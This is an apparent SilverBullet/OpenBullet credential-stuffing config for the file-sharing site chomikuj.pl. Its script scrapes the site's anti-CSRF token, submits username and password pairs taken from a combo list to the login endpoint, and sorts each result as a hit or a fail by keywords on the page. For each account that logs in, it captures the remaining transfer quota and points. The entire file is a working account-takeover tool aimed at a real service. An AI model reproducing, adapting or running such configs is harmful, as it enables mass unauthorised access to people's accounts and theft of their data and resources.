[SETTINGS]
{
  "Name": "chomikuj.pl",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-01T14:56:31.551552+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "chomikuj",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "http://chomikuj.pl/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input name=\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\" />" Recursive=TRUE -> VAR "tk" 

FUNCTION Split "," 1 "<tk>" -> VAR "tok1" 

FUNCTION Split "," 2 "<tk>" -> VAR "tok2" 

FUNCTION Translate 
  KEY "]" VALUE "" 
  KEY "[" VALUE "" 
  "<tok1>" -> VAR "tk1" 

FUNCTION Translate 
  KEY "]" VALUE "" 
  KEY "[" VALUE "" 
  "<tok1>" -> VAR "tk2" 

REQUEST POST "http://chomikuj.pl/action/Login/TopBarLogin" 
  CONTENT "__RequestVerificationToken=<tk1>&ReturnUrl=&Login=<USER>&Password=<PASS>&__RequestVerificationToken=<tk2>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "title=\"Transfer\"" 
  KEYCHAIN Failure OR 
    KEY "Niepoprawne dane logowania" 

PARSE "<SOURCE>" LR "title=\"Transfer\" rel=\"nofollow\"><strong>" "</strong>" CreateEmpty=FALSE -> CAP "GB" 

PARSE "<SOURCE>" LR "title=\"Punkty\" rel=\"nofollow\"><strong>" "</strong>" CreateEmpty=FALSE -> CAP "Punkty" 

